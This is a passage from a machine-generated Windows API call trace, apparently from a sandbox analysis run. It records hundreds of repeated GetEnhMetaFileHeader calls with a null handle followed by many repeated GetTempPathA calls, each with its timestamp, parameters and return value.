lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.315] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | 
out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 